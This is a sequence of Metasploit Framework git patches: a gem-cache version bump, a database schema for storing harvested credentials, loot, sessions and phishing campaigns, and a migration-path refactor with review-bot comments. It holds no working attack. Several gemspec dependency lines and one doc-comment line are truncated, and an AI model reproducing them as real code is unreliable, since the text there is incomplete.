rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/secret_token.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/secret_token.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/session_store.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/session_store.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/session_store.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/session_store.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/wrap_parameters.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/wrap_parameters.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/wrap_parameters.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/wrap_parameters.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/routes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/routes.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/routes.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/routes.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/db/schema.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/db/schema.rb
new file mode 100644
index 0000000000..bd6f124190
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/db/schema.rb
@@ -0,0 +1,638 @@ +# encoding: UTF-8 +# This file is auto-generated from the current state of the database. Instead +# of editing this file, please use the migrations feature of Active Record to +# incrementally modify your database, and then regenerate this schema definition. +# +# Note that this schema.rb definition is the authoritative source for your +# database schema. If you need to create the application database on another +# system, you should be using db:schema:load, not running all the migrations +# from scratch. The latter is a flawed and unsustainable approach (the more migrations +# you'll amass, the slower it'll run and the greater likelihood for issues). +# +# It's strongly recommended to check this file into your version control system. + +ActiveRecord::Schema.define(:version => 20130228214900) do + + create_table "api_keys", :force => true do |t| + t.text "token" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + end + + create_table "attachments", :force => true do |t| + t.string "name", :limit => 512 + t.binary "data" + t.string "content_type", :limit => 512 + t.boolean "inline", :default => true, :null => false + t.boolean "zip", :default => false, :null => false + t.integer "campaign_id" + end + + create_table "attachments_email_templates", :id => false, :force => true do |t| + t.integer "attachment_id" + t.integer "email_template_id" + end + + create_table "campaigns", :force => true do |t| + t.integer "workspace_id", :null => false + t.string "name", :limit => 512 + t.text "prefs" + t.integer "status", :default => 0 + t.datetime "started_at" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + end + + create_table "clients", :force => true do |t| + t.integer "host_id" + t.datetime "created_at" + t.string "ua_string", :limit => 1024, :null => false + t.string "ua_name", :limit => 64 + t.string "ua_ver", :limit => 32 + t.datetime "updated_at" + t.integer "campaign_id" + end + 
+ create_table "creds", :force => true do |t| + t.integer "service_id", :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.string "user", :limit => 2048 + t.string "pass", :limit => 4096 + t.boolean "active", :default => true + t.string "proof", :limit => 4096 + t.string "ptype", :limit => 256 + t.integer "source_id" + t.string "source_type" + end + + create_table "email_addresses", :force => true do |t| + t.integer "campaign_id", :null => false + t.string "first_name", :limit => 512 + t.string "last_name", :limit => 512 + t.string "address", :limit => 512 + t.boolean "sent", :default => false, :null => false + t.datetime "clicked_at" + end + + create_table "email_templates", :force => true do |t| + t.string "name", :limit => 512 + t.string "subject", :limit => 1024 + t.text "body" + t.integer "parent_id" + t.integer "campaign_id" + t.text "prefs" + end + + create_table "events", :force => true do |t| + t.integer "workspace_id" + t.integer "host_id" + t.datetime "created_at" + t.string "name" + t.datetime "updated_at" + t.boolean "critical" + t.boolean "seen" + t.string "username" + t.text "info" + end + + create_table "exploit_attempts", :force => true do |t| + t.integer "host_id" + t.integer "service_id" + t.integer "vuln_id" + t.datetime "attempted_at" + t.boolean "exploited" + t.string "fail_reason" + t.string "username" + t.text "module" + t.integer "session_id" + t.integer "loot_id" + t.integer "port" + t.string "proto" + t.text "fail_detail" + end + + create_table "exploited_hosts", :force => true do |t| + t.integer "host_id", :null => false + t.integer "service_id" + t.string "session_uuid", :limit => 8 + t.string "name", :limit => 2048 + t.string "payload", :limit => 2048 + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + end + + create_table "host_details", :force => true do |t| + t.integer "host_id" + t.integer "nx_console_id" + t.integer "nx_device_id" + t.string 
"src" + t.string "nx_site_name" + t.string "nx_site_importance" + t.string "nx_scan_template" + t.float "nx_risk_score" + end + + create_table "hosts", :force => true do |t| + t.datetime "created_at" + t.string "address", :limit => nil + t.string "mac" + t.string "comm" + t.string "name" + t.string "state" + t.string "os_name" + t.string "os_flavor" + t.string "os_sp" + t.string "os_lang" + t.string "arch" + t.integer "workspace_id" + t.datetime "updated_at" + t.text "purpose" + t.string "info", :limit => 65536 + t.text "comments" + t.text "scope" + t.text "virtual_host" + t.integer "note_count", :default => 0 + t.integer "vuln_count", :default => 0 + t.integer "service_count", :default => 0 + t.integer "host_detail_count", :default => 0 + t.integer "exploit_attempt_count", :default => 0 + end + + add_index "hosts", ["address"], :name => "index_hosts_on_address" + add_index "hosts", ["name"], :name => "index_hosts_on_name" + add_index "hosts", ["os_flavor"], :name => "index_hosts_on_os_flavor" + add_index "hosts", ["os_name"], :name => "index_hosts_on_os_name" + add_index "hosts", ["purpose"], :name => "index_hosts_on_purpose" + add_index "hosts", ["state"], :name => "index_hosts_on_state" + + create_table "hosts_tags", :id => false, :force => true do |t| + t.integer "host_id" + t.integer "tag_id" + end + + create_table "imported_creds", :force => true do |t| + t.integer "workspace_id", :default => 1, :null => false + t.string "user", :limit => 512 + t.string "pass", :limit => 512 + t.string "ptype", :limit => 16, :default => "password" + end + + create_table "listeners", :force => true do |t| + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.integer "workspace_id", :default => 1, :null => false + t.integer "task_id" + t.boolean "enabled", :default => true + t.text "owner" + t.text "payload" + t.text "address" + t.integer "port" + t.binary "options" + t.text "macro" + end + + create_table "loots", :force => true do |t| + 
t.integer "workspace_id", :default => 1, :null => false + t.integer "host_id" + t.integer "service_id" + t.string "ltype", :limit => 512 + t.string "path", :limit => 1024 + t.text "data" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.string "content_type" + t.text "name" + t.text "info" + end + + create_table "macros", :force => true do |t| + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.text "owner" + t.text "name" + t.text "description" + t.binary "actions" + t.binary "prefs" + end + + create_table "mod_refs", :force => true do |t| + t.string "module", :limit => 1024 + t.string "mtype", :limit => 128 + t.text "ref" + end + + create_table "module_actions", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + end + + add_index "module_actions", ["module_detail_id"], :name => "index_module_actions_on_module_detail_id" + + create_table "module_archs", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + end + + add_index "module_archs", ["module_detail_id"], :name => "index_module_archs_on_module_detail_id" + + create_table "module_authors", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + t.text "email" + end + + add_index "module_authors", ["module_detail_id"], :name => "index_module_authors_on_module_detail_id" + + create_table "module_details", :force => true do |t| + t.datetime "mtime" + t.text "file" + t.string "mtype" + t.text "refname" + t.text "fullname" + t.text "name" + t.integer "rank" + t.text "description" + t.string "license" + t.boolean "privileged" + t.datetime "disclosure_date" + t.integer "default_target" + t.text "default_action" + t.string "stance" + t.boolean "ready" + end + + add_index "module_details", ["description"], :name => "index_module_details_on_description" + add_index "module_details", ["mtype"], :name => "index_module_details_on_mtype" + add_index "module_details", ["name"], :name => 
"index_module_details_on_name" + add_index "module_details", ["refname"], :name => "index_module_details_on_refname" + + create_table "module_mixins", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + end + + add_index "module_mixins", ["module_detail_id"], :name => "index_module_mixins_on_module_detail_id" + + create_table "module_platforms", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + end + + add_index "module_platforms", ["module_detail_id"], :name => "index_module_platforms_on_module_detail_id" + + create_table "module_refs", :force => true do |t| + t.integer "module_detail_id" + t.text "name" + end + + add_index "module_refs", ["module_detail_id"], :name => "index_module_refs_on_module_detail_id" + add_index "module_refs", ["name"], :name => "index_module_refs_on_name" + + create_table "module_targets", :force => true do |t| + t.integer "module_detail_id" + t.integer "index" + t.text "name" + end + + add_index "module_targets", ["module_detail_id"], :name => "index_module_targets_on_module_detail_id" + + create_table "nexpose_consoles", :force => true do |t| + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.boolean "enabled", :default => true + t.text "owner" + t.text "address" + t.integer "port", :default => 3780 + t.text "username" + t.text "password" + t.text "status" + t.text "version" + t.text "cert" + t.binary "cached_sites" + t.text "name" + end + + create_table "notes", :force => true do |t| + t.datetime "created_at" + t.string "ntype", :limit => 512 + t.integer "workspace_id", :default => 1, :null => false + t.integer "service_id" + t.integer "host_id" + t.datetime "updated_at" + t.boolean "critical" + t.boolean "seen" + t.text "data" + end + + add_index "notes", ["ntype"], :name => "index_notes_on_ntype" + + create_table "profiles", :force => true do |t| + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.boolean "active", 
:default => true + t.text "name" + t.text "owner" + t.binary "settings" + end + + create_table "refs", :force => true do |t| + t.integer "ref_id" + t.datetime "created_at" + t.string "name", :limit => 512 + t.datetime "updated_at" + end + + add_index "refs", ["name"], :name => "index_refs_on_name" + + create_table "report_templates", :force => true do |t| + t.integer "workspace_id", :default => 1, :null => false + t.string "created_by" + t.string "path", :limit => 1024 + t.text "name" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + end + + create_table "reports", :force => true do |t| + t.integer "workspace_id", :default => 1, :null => false + t.string "created_by" + t.string "rtype" + t.string "path", :limit => 1024 + t.text "options" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.datetime "downloaded_at" + t.integer "task_id" + t.string "name", :limit => 63 + end + + create_table "routes", :force => true do |t| + t.integer "session_id" + t.string "subnet" + t.string "netmask" + end + + create_table "services", :force => true do |t| + t.integer "host_id" + t.datetime "created_at" + t.integer "port", :null => false + t.string "proto", :limit => 16, :null => false + t.string "state" + t.string "name" + t.datetime "updated_at" + t.text "info" + end + + add_index "services", ["name"], :name => "index_services_on_name" + add_index "services", ["port"], :name => "index_services_on_port" + add_index "services", ["proto"], :name => "index_services_on_proto" + add_index "services", ["state"], :name => "index_services_on_state" + + create_table "session_events", :force => true do |t| + t.integer "session_id" + t.string "etype" + t.binary "command" + t.binary "output" + t.string "remote_path" + t.string "local_path" + t.datetime "created_at" + end + + create_table "sessions", :force => true do |t| + t.integer "host_id" + t.string "stype" + t.string "via_exploit" + t.string "via_payload" + t.string 
"desc" + t.integer "port" + t.string "platform" + t.text "datastore" + t.datetime "opened_at", :null => false + t.datetime "closed_at" + t.string "close_reason" + t.integer "local_id" + t.datetime "last_seen" + end + + create_table "tags", :force => true do |t| + t.integer "user_id" + t.string "name", :limit => 1024 + t.text "desc" + t.boolean "report_summary", :default => false, :null => false + t.boolean "report_detail", :default => false, :null => false + t.boolean "critical", :default => false, :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + end + + create_table "tasks", :force => true do |t| + t.integer "workspace_id", :default => 1, :null => false + t.string "created_by" + t.string "module" + t.datetime "completed_at" + t.string "path", :limit => 1024 + t.string "info" + t.string "description" + t.integer "progress" + t.text "options" + t.text "error" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.text "result" + t.string "module_uuid", :limit => 8 + t.binary "settings" + end + + create_table "users", :force => true do |t| + t.string "username" + t.string "crypted_password" + t.string "password_salt" + t.string "persistence_token" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.string "fullname" + t.string "email" + t.string "phone" + t.string "company" + t.string "prefs", :limit => 524288 + t.boolean "admin", :default => true, :null => false + end + + create_table "vuln_attempts", :force => true do |t| + t.integer "vuln_id" + t.datetime "attempted_at" + t.boolean "exploited" + t.string "fail_reason" + t.string "username" + t.text "module" + t.integer "session_id" + t.integer "loot_id" + t.text "fail_detail" + end + + create_table "vuln_details", :force => true do |t| + t.integer "vuln_id" + t.float "cvss_score" + t.string "cvss_vector" + t.string "title" + t.text "description" + t.text "solution" + t.binary "proof" + t.integer 
"nx_console_id" + t.integer "nx_device_id" + t.string "nx_vuln_id" + t.float "nx_severity" + t.float "nx_pci_severity" + t.datetime "nx_published" + t.datetime "nx_added" + t.datetime "nx_modified" + t.text "nx_tags" + t.text "nx_vuln_status" + t.text "nx_proof_key" + t.string "src" + t.integer "nx_scan_id" + t.datetime "nx_vulnerable_since" + t.string "nx_pci_compliance_status" + end + + create_table "vulns", :force => true do |t| + t.integer "host_id" + t.integer "service_id" + t.datetime "created_at" + t.string "name" + t.datetime "updated_at" + t.string "info", :limit => 65536 + t.datetime "exploited_at" + t.integer "vuln_detail_count", :default => 0 + t.integer "vuln_attempt_count", :default => 0 + end + + add_index "vulns", ["name"], :name => "index_vulns_on_name" + + create_table "vulns_refs", :id => false, :force => true do |t| + t.integer "ref_id" + t.integer "vuln_id" + end + + create_table "web_forms", :force => true do |t| + t.integer "web_site_id", :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.text "path" + t.string "method", :limit => 1024 + t.text "params" + t.text "query" + end + + add_index "web_forms", ["path"], :name => "index_web_forms_on_path" + + create_table "web_pages", :force => true do |t| + t.integer "web_site_id", :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.text "path" + t.text "query" + t.integer "code", :null => false + t.text "cookie" + t.text "auth" + t.text "ctype" + t.datetime "mtime" + t.text "location" + t.text "headers" + t.binary "body" + t.binary "request" + end + + add_index "web_pages", ["path"], :name => "index_web_pages_on_path" + add_index "web_pages", ["query"], :name => "index_web_pages_on_query" + + create_table "web_sites", :force => true do |t| + t.integer "service_id", :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.string "vhost", :limit => 2048 + 
t.text "comments" + t.text "options" + end + + add_index "web_sites", ["comments"], :name => "index_web_sites_on_comments" + add_index "web_sites", ["options"], :name => "index_web_sites_on_options" + add_index "web_sites", ["vhost"], :name => "index_web_sites_on_vhost" + + create_table "web_templates", :force => true do |t| + t.string "name", :limit => 512 + t.string "title", :limit => 512 + t.string "body", :limit => 524288 + t.integer "campaign_id" + t.text "prefs" + end + + create_table "web_vulns", :force => true do |t| + t.integer "web_site_id", :null => false + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.text "path", :null => false + t.string "method", :limit => 1024, :null => false + t.text "params", :null => false + t.text "pname", :null => false + t.integer "risk", :null => false + t.string "name", :limit => 1024, :null => false + t.text "query" + t.text "category", :null => false + t.text "confidence", :null => false + t.text "description" + t.text "blame" + t.binary "request" + t.binary "proof", :null => false + t.string "owner" + t.text "payload" + end + + add_index "web_vulns", ["method"], :name => "index_web_vulns_on_method" + add_index "web_vulns", ["name"], :name => "index_web_vulns_on_name" + add_index "web_vulns", ["path"], :name => "index_web_vulns_on_path" + + create_table "wmap_requests", :force => true do |t| + t.string "host" + t.string "address", :limit => nil + t.integer "port" + t.integer "ssl" + t.string "meth", :limit => 32 + t.text "path" + t.text "headers" + t.text "query" + t.text "body" + t.string "respcode", :limit => 16 + t.text "resphead" + t.text "response" + t.datetime "created_at" + t.datetime "updated_at" + end + + create_table "wmap_targets", :force => true do |t| + t.string "host" + t.string "address", :limit => nil + t.integer "port" + t.integer "ssl" + t.integer "selected" + t.datetime "created_at" + t.datetime "updated_at" + end + + create_table "workspace_members", :id => false, 
:force => true do |t| + t.integer "workspace_id", :null => false + t.integer "user_id", :null => false + end + + create_table "workspaces", :force => true do |t| + t.string "name" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.string "boundary", :limit => 4096 + t.string "description", :limit => 4096 + t.integer "owner_id" + t.boolean "limit_to_network", :default => false, :null => false + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/lib/assets/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/lib/assets/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/lib/assets/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/lib/assets/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/log/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/log/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/log/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/log/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/404.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/404.html similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/404.html rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/404.html 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/422.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/422.html similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/422.html rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/422.html diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/500.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/500.html similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/500.html rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/500.html diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/favicon.ico b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/favicon.ico similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/favicon.ico rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/favicon.ico diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/script/rails similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/script/rails rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/script/rails 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/lib/base64_serializer_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/lib/base64_serializer_spec.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/lib/base64_serializer_spec.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/lib/base64_serializer_spec.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/spec_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/spec_helper.rb similarity index 96% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/spec_helper.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/spec_helper.rb index 66d1de6804..32b4bef890 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/spec_helper.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/spec_helper.rb @@ -11,6 +11,8 @@ Bundler.require(:default, :test) # full backtrace in logs so its easier to trace errors Rails.backtrace_cleaner.remove_silencers! +require 'simplecov' + # Requires supporting ruby files with custom matchers and macros, etc, # in spec/support/ and its subdirectories. support_glob = MetasploitDataModels.root.join('spec', 'support', '**', '*.rb') diff --git a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.5.1.gemspec similarity index 72% rename from lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec rename to lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.5.1.gemspec index 7b728268c3..a88f2d9cd0 100644 --- a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec +++ b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.5.1.gemspec 
@@ -2,11 +2,11 @@ Gem::Specification.new do |s| s.name = "metasploit_data_models" - s.version = "0.3.0" + s.version = "0.5.1" s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= s.authors = ["Trevor Rosen"] - s.date = "2012-11-01" + s.date = "2013-03-01" s.description = "Implements minimal ActiveRecord models and database helper code used in both the Metasploit Framework (MSF) and Metasploit commercial editions." s.email = ["trevor_rosen@rapid7.com"] s.executables = ["mdm_console"] @@ -21,20 +21,26 @@ Gem::Specification.new do |s| if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then s.add_development_dependency(%q, [">= 0"]) - s.add_runtime_dependency(%q, [">= 0"]) + s.add_development_dependency(%q, [">= 0"]) + s.add_development_dependency(%q, [">= 0"]) + s.add_runtime_dependency(%q, [">= 3.2.10"]) s.add_runtime_dependency(%q, [">= 0"]) s.add_runtime_dependency(%q, [">= 0"]) s.add_runtime_dependency(%q, [">= 0"]) else s.add_dependency(%q, [">= 0"]) - s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 3.2.10"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) end else s.add_dependency(%q, [">= 0"]) - s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 3.2.10"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) From af4b3fa287e3d642c5d1bcc995b0ac89803b1a40 Mon Sep 17 00:00:00 2001 
From: Luke Imhoff Date: Sat, 2 Mar 2013 20:33:48 -0600 Subject: [PATCH 57/87] Use ActiveRecord::Migrator multiple migrations paths support [#44034071] ActiveRecord::Migrator has a class attribute, migrations_paths, specificially for storing a list of different directories that have migrations in them. ActiveRecord::Migrator.migrations_paths is used in rake db:load_config, which is a dependency of db:migrate, etc. that is passed to ActiveRecord::Migrator.migrate. Since migrate supports an array of directories, and not just a single directory, there is no need to merge all the migrations paths into one temporary directory as was previously done. --- lib/msf/core/db_manager.rb | 75 ++++++++++++++---------------------- lib/msf/ui/console/driver.rb | 4 +- 2 files changed, 31 insertions(+), 48 deletions(-) diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 42974b229a..287442150b 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -56,9 +56,6 @@ class DBManager # Flag to indicate database migration has completed attr_accessor :migrated - # Array of additional migration paths - attr_accessor :migration_paths - # Flag to indicate that modules are cached attr_accessor :modules_cached @@ -69,7 +66,6 @@ class DBManager self.framework = framework self.migrated = false - self.migration_paths = [] self.modules_cached = false self.modules_caching = false 
@@ -82,17 +78,17 @@ class DBManager end initialize_database_support - - # have to set migration paths after initialize_database_support as it loads - # MetasploitDataModels. - self.migration_paths << MetasploitDataModels.root.join('db', 'migrate').to_s end - # - # Add additional migration paths - # - def add_migration_path(path) - self.migration_paths.push(path) + def initialize_metasploit_data_models + # Provide access to ActiveRecord models shared w/ commercial versions + require "metasploit_data_models" + + metasploit_data_model_migrations_pathname = MetasploitDataModels.root.join( + 'db', + 'migrate' + ) + ActiveRecord::Migrator.migrations_paths << metasploit_data_model_migrations_pathname.to_s end # @@ -105,8 +101,7 @@ class DBManager require "active_record" - # Provide access to ActiveRecord models shared w/ commercial versions - require "metasploit_data_models" + initialize_metasploit_data_models # Patches issues with ActiveRecord require "msf/core/patches/active_record" 
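Review bot: `initialize_metasploit_data_models` appends to `ActiveRecord::Migrator.migrations_paths` with `<<`, and that list is a class-level attribute shared by the whole process, so each further `DBManager` built in the same process adds the same directory again. The removed `migration_paths` accessor was per instance, where this could not accumulate. Duplicate entries would presumably make the migrator see each migration file twice, which is worth confirming against the ActiveRecord version in use. An idempotent append avoids the question: `paths = ActiveRecord::Migrator.migrations_paths` followed by `paths << mdm_path unless paths.include?(mdm_path)`.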
@@ -283,45 +278,31 @@ class DBManager end end + # Migrate database to latest schema version. # - # Migrate database to latest schema version + # @param verbose [Boolean] see ActiveRecord::Migration.verbose + # @return [Array] List of migrations that ran. # + # @see ActiveRecord::Migrator.migrate def migrate(verbose=false) + ran = [] + ActiveRecord::Migration.verbose = verbose - temp_dir = ::File.expand_path(::File.join( Msf::Config.config_directory, "schema", "#{Time.now.to_i}_#{$$}" )) - ::FileUtils.rm_rf(temp_dir) - ::FileUtils.mkdir_p(temp_dir) - - self.migration_paths.each do |mpath| - dir = Dir.new(mpath) rescue nil - if not dir - elog("Could not access migration path #{mpath}") - next - end - - dir.entries.each do |ent| - next unless ent =~ /^\d+.*\.rb$/ - ::FileUtils.cp( ::File.join(mpath, ent), ::File.join(temp_dir, ent) ) + ActiveRecord::Base.connection_pool.with_connection do + begin + ran = ActiveRecord::Migrator.migrate( + ActiveRecord::Migrator.migrations_paths + ) + # ActiveRecord::Migrator#migrate rescues all errors and re-raises them as + # StandardError + rescue StandardError => error + self.error = error + elog("DB.migrate threw an exception: #{error}") + dlog("Call stack:\n#{error.backtrace.join "\n"}") end end - success = true - begin - - ::ActiveRecord::Base.connection_pool.with_connection { - ActiveRecord::Migration.verbose = verbose - ActiveRecord::Migrator.migrate(temp_dir, nil) - } - rescue ::Exception => e - self.error = e - elog("DB.migrate threw an exception: #{e}") - dlog("Call stack:\n#{e.backtrace.join "\n"}") - success = false - end - - ::FileUtils.rm_rf(temp_dir) - - return true + return ran end def workspace=(workspace) diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index 49d9698482..10c2836a80 100644 --- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb 
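Review bot: When the migrator raises, `migrate` stores the exception in `error`, logs it and still returns `ran`, which is the empty array it started with, so a failed migration looks the same to the caller as a database that was already up to date. The new `@return` text does not mention this. I would extend the doc comment with `# @return [Array] migrations that ran; also empty when migration failed, in which case {#error} holds the exception`. Clearing `self.error` at the top of the method would also keep a stale error from an earlier call from being read as a new failure, though whether other code relies on `error` persisting is not visible in this hunk.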
@@ -171,7 +171,9 @@ class Driver < Msf::Ui::Driver # Append any migration paths necessary to bring the database online if opts['DatabaseMigrationPaths'] - opts['DatabaseMigrationPaths'].each {|m| framework.db.add_migration_path(m) } + opts['DatabaseMigrationPaths'].each do |migrations_path| + ActiveRecord::Migrator.migrations_paths << migrations_path + end end # Look for our database configuration in the following places, in order: From c9a162ac33551372096fd0e1f3b3c7877eec6a0e Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Sat, 2 Mar 2013 21:09:45 -0600 Subject: [PATCH 58/87] Correct return type of Msf::DBManager#migrate. --- lib/msf/core/db_manager.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 287442150b..6b54c9f7a9 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -281,7 +281,7 @@ class DBManager # Migrate database to latest schema version. # # @param verbose [Boolean] see ActiveRecord::Migration.verbose - # @return [Array] List of migrations that ran. + # @return [Array Date: Sat, 2 Mar 2013 21:16:02 -0600 Subject: [PATCH 59/87] Document Msf::DBManager#initialize_metasploit_data_models --- lib/msf/core/db_manager.rb | 25 ++++++++++++++----------- 1 file changed, 14 insertions(+), 11 deletions(-) diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 6b54c9f7a9..726eb682f7 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -80,17 +80,6 @@ class DBManager initialize_database_support end - def initialize_metasploit_data_models - # Provide access to ActiveRecord models shared w/ commercial versions - require "metasploit_data_models" - - metasploit_data_model_migrations_pathname = MetasploitDataModels.root.join( - 'db', - 'migrate' - ) - ActiveRecord::Migrator.migrations_paths << metasploit_data_model_migrations_pathname.to_s - end - # # Do what is necessary to load our database support # 
